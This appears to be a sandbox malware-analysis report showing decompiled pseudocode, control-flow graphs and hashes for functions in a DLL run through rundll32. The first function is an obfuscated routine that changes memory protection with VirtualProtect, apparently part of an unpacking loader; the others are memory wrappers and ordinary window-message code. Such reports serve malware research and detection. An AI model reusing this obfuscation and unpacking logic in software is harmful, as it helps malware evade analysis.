                                                                        control_flow_graph 311 10003310-10003320 312 10003322-1000332a 311->312 313 1000332b-10003374 311->313 314 100033fa-100034e1 313->314 315 1000337a-10003387 313->315 316 10003500-1000356c VirtualProtect 314->316 317 100034e3-100034fc 314->317 318 10003389-1000338e 315->318 319 100033ed-100033f9 315->319 317->316 320 10003390-1000339c 318->320 321 100033cd-100033ea 318->321 320->321 322 1000339e-100033cb 320->322 321->319 322->319 322->321
                                                                        C-Code - Quality: 89%
                                                                        			E10003310() {
				long _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr _t91;
				signed int _t101;
				signed int _t116;
				signed int _t122;
				intOrPtr _t126;
				signed int _t127;
				signed int _t132;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t141;
				signed int _t150;
				signed int _t158;
				signed int _t165;
				signed int _t175;
				signed int _t186;
				signed int _t216;
				signed int _t223;
				signed int _t227;
				intOrPtr _t235;
				signed int _t238;
				void* _t239;

				_t80 =  *(_t239 + 0x18);
				_t126 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t239 + 8)) = _t126;
				if(_t126 != 0) {
					_t132 =  *(_t80 + 0xc);
					_t127 =  *0x1004b0dc; // 0x0
					_t5 = _t127 + 1; // 0x1
					_t101 =  *0x1004b0ec; // 0x0
					_t165 =  *0x1004b0e0; // 0x0
					_t7 = _t165 + 0x1000000; // 0x1000000
					_t83 =  *0x1004b0e4; // 0x0
					_t150 =  *0x1004b0d8; // 0x0
					 *(_t239 + 0x10) = _t132;
					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
						_t35 = _t83 * _t165 + 1; // 0x1
						 *(_t239 + 0x1c) = _t83 * _t165;
						_t135 =  *0x1004b0e8; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb edi, edi");
						_t216 =  *0x1004b0d8; // 0x0
						_t223 =  *0x1004b0d8; // 0x0
						asm("sbb esi, esi");
						_t158 =  *0x1004b0ec; // 0x0
						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
						_t175 =  *0x1004b0e0; // 0x0
						_t116 = _t158 * _t127;
						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
						}
						_t186 =  *0x1004b0e0; // 0x0
						_t227 = _t158 * 0x3fffffff;
						_t122 =  *0x1004b0d8; // 0x0
						_t74 = _t227 + 1; // 0x1
						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t87);
					} else {
						_t137 =  *((intOrPtr*)(_t239 + 0x28));
						_t235 =  *_t137;
						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
								L7:
								_t91 =  *((intOrPtr*)(_t239 + 0x24));
								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
							} else {
								_t141 =  *((intOrPtr*)(_t239 + 0x24));
								_t238 =  *(_t141 + 0x3c);
								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}



























                                                                        0x10003313
                                                                        0x10003317
                                                                        0x1000331c
                                                                        0x10003320
                                                                        0x1000332b
                                                                        0x1000332e
                                                                        0x10003334
                                                                        0x1000333b
                                                                        0x10003343
                                                                        0x1000334a
                                                                        0x10003353
                                                                        0x10003364
                                                                        0x10003370
                                                                        0x10003374
                                                                        0x100033ff
                                                                        0x10003408
                                                                        0x1000340c
                                                                        0x10003433
                                                                        0x10003447
                                                                        0x1000344f
                                                                        0x10003492
                                                                        0x10003498
                                                                        0x100034a6
                                                                        0x100034ac
                                                                        0x100034b0
                                                                        0x100034be
                                                                        0x100034e1
                                                                        0x100034fc
                                                                        0x100034fc
                                                                        0x10003500
                                                                        0x10003515
                                                                        0x10003525
                                                                        0x1000352b
                                                                        0x10003559
                                                                        0x10003563
                                                                        0x1000356c
                                                                        0x1000337a
                                                                        0x1000337a
                                                                        0x1000337e
                                                                        0x10003383
                                                                        0x10003387
                                                                        0x1000338e
                                                                        0x100033cd
                                                                        0x100033cd
                                                                        0x100033e7
                                                                        0x10003390
                                                                        0x10003390
                                                                        0x10003394
                                                                        0x1000339c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000339c
                                                                        0x1000338e
                                                                        0x100033f9
                                                                        0x100033f9
                                                                        0x10003322
                                                                        0x1000332a
                                                                        0x1000332a

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                        • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                        • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037855 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 10037855-10037867 call 10011bf0 327 10037897-100378a8 call 10037552 324->327 328 10037869-10037871 324->328 336 100378aa-100378b8 call 10037732 327->336 337 100378bd-100378cc 327->337 330 10037873-1003788a call 1003768d 328->330 331 10037890 call 10037446 328->331 330->331 335 10037895 331->335 335->327 336->337
                                                                        C-Code - Quality: 94%
                                                                        			E10037855(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011BF0(0x1003aa13, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x1004eff0; // 0x1004eff4
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E1003768D(0x1004eff4);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x1004eff0 = _t15; // executed
					}
					_t14 = E10037446(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x1004eff0; // 0x1004eff4
				_t23 = E10037552(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x1004eff0; // 0x1004eff4
					_t23 = _t12;
					E10037732(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}











                                                                        0x1003785a
                                                                        0x1003785f
                                                                        0x10037861
                                                                        0x10037867
                                                                        0x10037869
                                                                        0x10037871
                                                                        0x10037878
                                                                        0x1003787b
                                                                        0x1003787f
                                                                        0x10037884
                                                                        0x10037888
                                                                        0x1003788a
                                                                        0x1003788a
                                                                        0x10037890
                                                                        0x10037895
                                                                        0x10037895
                                                                        0x10037899
                                                                        0x100378a4
                                                                        0x100378a8
                                                                        0x100378aa
                                                                        0x100378ad
                                                                        0x100378b3
                                                                        0x100378b8
                                                                        0x100378b8
                                                                        0x100378c4
                                                                        0x100378cc

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1003785A
                                                                          • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocH_prolog
                                                                        • String ID:
                                                                        • API String ID: 3910492588-0
                                                                        • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                        • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                        • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100045D0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}




                                                                        0x100045e4
                                                                        0x100045ea

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                        • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                        • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100045F0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100045F0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                        0x100045ff
                                                                        0x10004605

                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                        • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                        • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 1001D99B Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 315windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E1001D99B(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t108;
				void* _t111;
				signed int _t112;
				signed int _t113;
				signed int _t115;
				intOrPtr _t119;
				void* _t132;
				signed int _t136;
				signed int _t140;
				void* _t148;
				intOrPtr* _t155;
				signed int _t157;
				signed int _t169;
				signed int _t170;
				signed int _t173;
				signed int _t183;
				void* _t185;
				signed short _t192;
				void* _t195;
				void* _t198;
				void* _t200;
				void* _t201;
				void* _t204;

				_t108 = E10011BF0(0x1003b3ea, _t198);
				_t201 = _t200 - 0x7c;
				_t155 =  *((intOrPtr*)(_t198 + 8));
				_t192 =  *(_t155 + 4);
				_t183 = __ecx;
				 *(_t198 - 0x10) = __ecx;
				 *(_t198 - 0x1c) = _t192;
				if(_t192 == 0x200 || _t192 == 0xa0 || _t192 == 0x202 || _t192 == 0x205 || _t192 == 0x208) {
					_t108 = GetKeyState(1);
					if(_t108 < 0) {
						L46:
						_t192 =  *(_t198 - 0x1c);
						goto L47;
					}
					_t108 = GetKeyState(2);
					if(_t108 < 0) {
						goto L46;
					}
					_t108 = GetKeyState(4);
					if(_t108 < 0) {
						goto L46;
					} else {
						_t111 = E100373DB();
						_push( *_t155);
						_t195 = _t111;
						 *(_t198 - 0x18) = _t195;
						while(1) {
							_t108 = E100220EE(_t198);
							if(_t108 == 0) {
								break;
							}
							__eflags =  *(_t108 + 0x38) & 0x00000401;
							if(( *(_t108 + 0x38) & 0x00000401) != 0) {
								break;
							} else {
								_push(GetParent( *(_t108 + 0x1c)));
								continue;
							}
						}
						if(_t108 == _t183) {
							_t157 =  *(_t195 + 0x3c);
							_t112 = E100223DE(_t183);
							__eflags = _t157;
							 *(_t198 - 0x14) = _t112;
							if(_t157 == 0) {
								L19:
								_t113 = E1001F77E(0x6c);
								 *(_t198 - 0x1c) = _t113;
								_t157 = 0;
								__eflags = _t113;
								 *(_t198 - 4) = 0;
								if(__eflags != 0) {
									_t157 = E1001D6C7(_t113, __eflags);
								}
								 *(_t198 - 4) =  *(_t198 - 4) | 0xffffffff;
								_t115 =  *((intOrPtr*)( *_t157 + 0x130))( *(_t198 - 0x14), 1);
								__eflags = _t115;
								if(_t115 != 0) {
									SendMessageA( *(_t157 + 0x1c), 0x401, 0, 0);
									_t183 =  *(_t198 - 0x10);
									 *(_t195 + 0x3c) = _t157;
									L24:
									E10011C50(_t198 - 0x88, 0, 0x30);
									_t119 =  *((intOrPtr*)(_t198 + 8));
									 *((intOrPtr*)(_t198 - 0x24)) =  *((intOrPtr*)(_t119 + 0x18));
									 *(_t198 - 0x28) =  *(_t119 + 0x14);
									ScreenToClient( *(_t183 + 0x1c), _t198 - 0x28);
									E10011C50(_t198 - 0x58, 0, 0x30);
									_t204 = _t201 + 0x18;
									 *(_t198 - 0x58) = 0x28;
									_t108 =  *((intOrPtr*)( *_t183 + 0x6c))( *(_t198 - 0x28),  *((intOrPtr*)(_t198 - 0x24)), _t198 - 0x58);
									asm("sbb ecx, ecx");
									_t169 =  ~(_t108 + 1) & _t183;
									__eflags =  *(_t195 + 0x44) - _t108;
									 *(_t198 - 0x1c) = _t108;
									 *(_t198 - 0x14) = _t169;
									if( *(_t195 + 0x44) != _t108) {
										L30:
										__eflags = _t108 - 0xffffffff;
										if(_t108 == 0xffffffff) {
											SendMessageA( *(_t157 + 0x1c), 0x401, 0, 0);
											L39:
											E1001D919(_t157,  *((intOrPtr*)(_t198 + 8)));
											_t83 = _t195 + 0x48; // 0x48
											_t185 = _t83;
											__eflags =  *_t185 - 0x28;
											if( *_t185 >= 0x28) {
												SendMessageA( *(_t157 + 0x1c), 0x405, 0, _t185);
											}
											 *(_t195 + 0x40) =  *(_t198 - 0x14);
											 *(_t195 + 0x44) =  *(_t198 - 0x1c);
											_t170 = 0xc;
											_t195 = _t198 - 0x58;
											_t108 = memcpy(_t185, _t195, _t170 << 2);
											_t183 = _t195 + _t170 + _t170;
											L42:
											__eflags =  *((intOrPtr*)(_t198 - 0x34)) - 0xffffffff;
											if( *((intOrPtr*)(_t198 - 0x34)) != 0xffffffff) {
												__eflags =  *(_t198 - 0x38);
												if(__eflags == 0) {
													_push( *((intOrPtr*)(_t198 - 0x34)));
													_t108 = E100107C8(_t157, _t183, _t195, __eflags);
												}
											}
											goto L75;
										}
										_t173 = 0xc;
										_t132 = memcpy(_t198 - 0x88, _t198 - 0x58, _t173 << 2);
										_t204 = _t204 + 0xc;
										 *(_t198 - 0x81) =  *(_t198 - 0x81) & 0x0000003f;
										__eflags =  *(_t132 + 0x38) & 0x00000400;
										if(( *(_t132 + 0x38) & 0x00000400) != 0) {
											_t65 = _t198 - 0x84;
											 *_t65 =  *(_t198 - 0x84) | 0x00000020;
											__eflags =  *_t65;
										}
										SendMessageA( *(_t157 + 0x1c), 0x404, 0, _t198 - 0x88);
										__eflags =  *(_t198 - 0x51) & 0x00000040;
										if(( *(_t198 - 0x51) & 0x00000040) != 0) {
											L35:
											SendMessageA( *(_t157 + 0x1c), 0x401, 1, 0);
											_t136 =  *(_t198 - 0x10);
											__eflags =  *(_t136 + 0x38) & 0x00000400;
											if(( *(_t136 + 0x38) & 0x00000400) != 0) {
												SendMessageA( *(_t157 + 0x1c), 0x411, 1, _t198 - 0x88);
											}
											SetWindowPos( *(_t157 + 0x1c), 0, 0, 0, 0, 0, 0x213);
											goto L38;
										} else {
											_t140 = E100230BA();
											__eflags = _t140;
											if(_t140 == 0) {
												L38:
												_t195 =  *(_t198 - 0x18);
												goto L39;
											}
											goto L35;
										}
									}
									__eflags =  *(_t195 + 0x40) - _t169;
									if( *(_t195 + 0x40) != _t169) {
										goto L30;
									}
									__eflags =  *(_t183 + 0x39) & 0x00000004;
									if(( *(_t183 + 0x39) & 0x00000004) == 0) {
										__eflags = _t108 - 0xffffffff;
										if(_t108 != 0xffffffff) {
											_t108 = E1001D919(_t157,  *((intOrPtr*)(_t198 + 8)));
										}
									} else {
										GetCursorPos(_t198 - 0x20);
										_t108 = SendMessageA( *(_t157 + 0x1c), 0x412, 0, ( *(_t198 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t198 - 0x20) & 0x0000ffff);
									}
									goto L42;
								} else {
									_t108 =  *((intOrPtr*)( *_t157 + 4))(1);
									goto L75;
								}
							}
							_t148 = E10008325(_t157);
							__eflags = _t148 -  *(_t198 - 0x14);
							if(_t148 !=  *(_t198 - 0x14)) {
								 *((intOrPtr*)( *_t157 + 0x60))();
								 *((intOrPtr*)( *_t157 + 4))(1);
								_t157 = 0;
								__eflags = 0;
								 *(_t195 + 0x3c) = 0;
							}
							__eflags = _t157;
							if(_t157 != 0) {
								goto L24;
							} else {
								goto L19;
							}
						}
						if(_t108 == 0) {
							 *(_t195 + 0x40) =  *(_t195 + 0x40) & _t108;
							 *(_t195 + 0x44) =  *(_t195 + 0x44) | 0xffffffff;
						}
						goto L75;
					}
				} else {
					L47:
					__eflags =  *(_t183 + 0x38) & 0x00000401;
					if(( *(_t183 + 0x38) & 0x00000401) == 0) {
						L75:
						 *[fs:0x0] =  *((intOrPtr*)(_t198 - 0xc));
						return _t108;
					}
					_push( *_t155);
					while(1) {
						_t108 = E100220EE(_t198);
						__eflags = _t108;
						if(_t108 == 0) {
							break;
						}
						__eflags = _t108 - _t183;
						if(_t108 == _t183) {
							L54:
							__eflags = _t192 - 0x100;
							if(_t192 < 0x100) {
								L56:
								__eflags = _t192 - 0x104;
								if(_t192 < 0x104) {
									L59:
									_t108 = 0;
									__eflags = 0;
									L60:
									__eflags =  *(_t183 + 0x39) & 0x00000004;
									if(( *(_t183 + 0x39) & 0x00000004) != 0) {
										goto L75;
									}
									__eflags = _t108;
									if(_t108 != 0) {
										L74:
										_t108 = E10021710(_t108);
										goto L75;
									}
									__eflags = _t192 - 0x201;
									if(_t192 == 0x201) {
										goto L74;
									}
									__eflags = _t192 - 0x203;
									if(_t192 == 0x203) {
										goto L74;
									}
									__eflags = _t192 - 0x204;
									if(_t192 == 0x204) {
										goto L74;
									}
									__eflags = _t192 - 0x206;
									if(_t192 == 0x206) {
										goto L74;
									}
									__eflags = _t192 - 0x207;
									if(_t192 == 0x207) {
										goto L74;
									}
									__eflags = _t192 - 0x209;
									if(_t192 == 0x209) {
										goto L74;
									}
									__eflags = _t192 - 0xa1;
									if(_t192 == 0xa1) {
										goto L74;
									}
									__eflags = _t192 - 0xa3;
									if(_t192 == 0xa3) {
										goto L74;
									}
									__eflags = _t192 - 0xa4;
									if(_t192 == 0xa4) {
										goto L74;
									}
									__eflags = _t192 - 0xa6;
									if(_t192 == 0xa6) {
										goto L74;
									}
									__eflags = _t192 - 0xa7;
									if(_t192 == 0xa7) {
										goto L74;
									}
									__eflags = _t192 - 0xa9;
									if(_t192 != 0xa9) {
										goto L75;
									}
									goto L74;
								}
								__eflags = _t192 - 0x107;
								if(_t192 > 0x107) {
									goto L59;
								}
								L58:
								_t108 = 1;
								goto L60;
							}
							__eflags = _t192 - 0x109;
							if(_t192 <= 0x109) {
								goto L58;
							}
							goto L56;
						}
						__eflags =  *(_t108 + 0x38) & 0x00000401;
						if(( *(_t108 + 0x38) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t108 + 0x1c)));
					}
					__eflags = _t108 - _t183;
					if(_t108 != _t183) {
						goto L75;
					}
					goto L54;
				}
			}





























                                                                        0x1001d9a0
                                                                        0x1001d9a5
                                                                        0x1001d9a9
                                                                        0x1001d9ad
                                                                        0x1001d9b7
                                                                        0x1001d9b9
                                                                        0x1001d9bc
                                                                        0x1001d9bf
                                                                        0x1001d9ed
                                                                        0x1001d9f2
                                                                        0x1001dcab
                                                                        0x1001dcab
                                                                        0x00000000
                                                                        0x1001dcab
                                                                        0x1001d9fa
                                                                        0x1001d9ff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001da07
                                                                        0x1001da0c
                                                                        0x00000000
                                                                        0x1001da12
                                                                        0x1001da12
                                                                        0x1001da17
                                                                        0x1001da19
                                                                        0x1001da1b
                                                                        0x1001da32
                                                                        0x1001da32
                                                                        0x1001da39
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001da20
                                                                        0x1001da26
                                                                        0x00000000
                                                                        0x1001da28
                                                                        0x1001da31
                                                                        0x00000000
                                                                        0x1001da31
                                                                        0x1001da26
                                                                        0x1001da3d
                                                                        0x1001da53
                                                                        0x1001da58
                                                                        0x1001da5d
                                                                        0x1001da5f
                                                                        0x1001da62
                                                                        0x1001da89
                                                                        0x1001da8b
                                                                        0x1001da91
                                                                        0x1001da94
                                                                        0x1001da96
                                                                        0x1001da98
                                                                        0x1001da9b
                                                                        0x1001daa4
                                                                        0x1001daa4
                                                                        0x1001daa8
                                                                        0x1001dab3
                                                                        0x1001dab9
                                                                        0x1001dabb
                                                                        0x1001dad7
                                                                        0x1001dadd
                                                                        0x1001dae0
                                                                        0x1001dae3
                                                                        0x1001daee
                                                                        0x1001daf3
                                                                        0x1001daff
                                                                        0x1001db09
                                                                        0x1001db0c
                                                                        0x1001db1a
                                                                        0x1001db21
                                                                        0x1001db30
                                                                        0x1001db37
                                                                        0x1001db3f
                                                                        0x1001db41
                                                                        0x1001db43
                                                                        0x1001db46
                                                                        0x1001db49
                                                                        0x1001db4c
                                                                        0x1001db9d
                                                                        0x1001db9d
                                                                        0x1001dba0
                                                                        0x1001dca3
                                                                        0x1001dc3f
                                                                        0x1001dc43
                                                                        0x1001dc48
                                                                        0x1001dc48
                                                                        0x1001dc4b
                                                                        0x1001dc4e
                                                                        0x1001dc5b
                                                                        0x1001dc5b
                                                                        0x1001dc64
                                                                        0x1001dc6a
                                                                        0x1001dc6f
                                                                        0x1001dc70
                                                                        0x1001dc73
                                                                        0x1001dc73
                                                                        0x1001dc75
                                                                        0x1001dc75
                                                                        0x1001dc79
                                                                        0x1001dc7f
                                                                        0x1001dc83
                                                                        0x1001dc89
                                                                        0x1001dc8c
                                                                        0x1001dc91
                                                                        0x1001dc83
                                                                        0x00000000
                                                                        0x1001dc79
                                                                        0x1001dbab
                                                                        0x1001dbb5
                                                                        0x1001dbb5
                                                                        0x1001dbb7
                                                                        0x1001dbc3
                                                                        0x1001dbc6
                                                                        0x1001dbc8
                                                                        0x1001dbc8
                                                                        0x1001dbc8
                                                                        0x1001dbc8
                                                                        0x1001dbe1
                                                                        0x1001dbe7
                                                                        0x1001dbeb
                                                                        0x1001dbf9
                                                                        0x1001dc04
                                                                        0x1001dc0a
                                                                        0x1001dc0d
                                                                        0x1001dc10
                                                                        0x1001dc23
                                                                        0x1001dc23
                                                                        0x1001dc36
                                                                        0x00000000
                                                                        0x1001dbed
                                                                        0x1001dbf0
                                                                        0x1001dbf5
                                                                        0x1001dbf7
                                                                        0x1001dc3c
                                                                        0x1001dc3c
                                                                        0x00000000
                                                                        0x1001dc3c
                                                                        0x00000000
                                                                        0x1001dbf7
                                                                        0x1001dbeb
                                                                        0x1001db4e
                                                                        0x1001db51
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001db53
                                                                        0x1001db57
                                                                        0x1001db86
                                                                        0x1001db89
                                                                        0x1001db93
                                                                        0x1001db93
                                                                        0x1001db59
                                                                        0x1001db5d
                                                                        0x1001db7b
                                                                        0x1001db7b
                                                                        0x00000000
                                                                        0x1001dabd
                                                                        0x1001dac3
                                                                        0x00000000
                                                                        0x1001dac3
                                                                        0x1001dabb
                                                                        0x1001da66
                                                                        0x1001da6b
                                                                        0x1001da6e
                                                                        0x1001da74
                                                                        0x1001da7d
                                                                        0x1001da80
                                                                        0x1001da80
                                                                        0x1001da82
                                                                        0x1001da82
                                                                        0x1001da85
                                                                        0x1001da87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001da87
                                                                        0x1001da41
                                                                        0x1001da47
                                                                        0x1001da4a
                                                                        0x1001da4a
                                                                        0x00000000
                                                                        0x1001da41
